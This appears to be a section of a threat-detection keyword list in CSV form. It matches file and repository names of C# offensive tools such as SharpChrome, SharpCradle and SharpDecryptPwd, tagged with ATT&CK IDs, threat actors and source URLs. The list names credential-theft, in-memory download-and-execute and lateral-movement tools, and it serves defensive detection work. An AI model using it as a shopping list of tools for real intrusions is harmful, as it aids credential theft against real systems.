"*/SharpCat/*",".{0,1000}\/SharpCat\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","N/A","10","10","16","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z","10888"
"*/SharpChassisType.exe*",".{0,1000}\/SharpChassisType\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10889"
"*/SharpCheckInfo.exe*",".{0,1000}\/SharpCheckInfo\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10890"
"*/SharpChisel.exe*",".{0,1000}\/SharpChisel\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10891"
"*/SharpChisel.exe*",".{0,1000}\/SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10892"
"*/SharpChrome.exe*",".{0,1000}\/SharpChrome\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10893"
"*/SharpChrome.exe*",".{0,1000}\/SharpChrome\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10894"
"*/SharpChrome.exe*",".{0,1000}\/SharpChrome\.exe.{0,1000}","offensive_tool_keyword","SharpChrome","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","10895"
"*/SharpChrome.exe*",".{0,1000}\/SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10896"
"*/SharpChromium.exe*",".{0,1000}\/SharpChromium\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10897"
"*/SharpChromium.exe*",".{0,1000}\/SharpChromium\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10898"
"*/SharpChromium.exe*",".{0,1000}\/SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10899"
"*/SharpChromium.git*",".{0,1000}\/SharpChromium\.git.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","10900"
"*/SharpClipboard.git*",".{0,1000}\/SharpClipboard\.git.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","1","N/A","N/A","8","1","N/A","N/A","N/A","N/A","10901"
"*/SharpClipHistory.exe*",".{0,1000}\/SharpClipHistory\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10902"
"*/SharpCloud.exe*",".{0,1000}\/SharpCloud\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10903"
"*/SharpCloud.exe*",".{0,1000}\/SharpCloud\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10904"
"*/SharpCloud.exe*",".{0,1000}\/SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10905"
"*/SharpCloud.git*",".{0,1000}\/SharpCloud\.git.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","10906"
"*/SharpCollection.git*",".{0,1000}\/SharpCollection\.git.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10907"
"*/SharpCollection/*",".{0,1000}\/SharpCollection\/.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10908"
"*/SharpCOM.exe*",".{0,1000}\/SharpCOM\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10909"
"*/SharpCOM.exe*",".{0,1000}\/SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10910"
"*/SharpCOM.exe*",".{0,1000}\/SharpCOM\.exe.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","1","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","10911"
"*/SharpCOM.git*",".{0,1000}\/SharpCOM\.git.{0,1000}","offensive_tool_keyword","SharpCOM","DCOM Lateral Movement","T1175","TA0008","N/A","N/A","Lateral Movement","https://github.com/rvrsh3ll/SharpCOM","1","1","N/A","N/A","10","2","128","30","2019-09-16T22:52:53Z","2018-12-13T15:10:55Z","10912"
"*/SharpCompile/*",".{0,1000}\/SharpCompile\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","10913"
"*/sharpcompile_*.*",".{0,1000}\/sharpcompile_.{0,1000}\..{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","10914"
"*/SharpCookieMonster.exe*",".{0,1000}\/SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10915"
"*/SharpCookieMonster.exe*",".{0,1000}\/SharpCookieMonster\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10916"
"*/SharpCradle/*",".{0,1000}\/SharpCradle\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","N/A","10","10","279","57","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z","10917"
"*/SharpCrashEventLog.exe*",".{0,1000}\/SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10918"
"*/SharpCrashEventLog.exe*",".{0,1000}\/SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","10919"
"*/SharpCrashEventLog.exe*",".{0,1000}\/SharpCrashEventLog\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","10920"
"*/SharpDecryptPwd.exe*",".{0,1000}\/SharpDecryptPwd\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","10921"
"*/SharpDecryptPwd.git*",".{0,1000}\/SharpDecryptPwd\.git.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","1","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","10922"
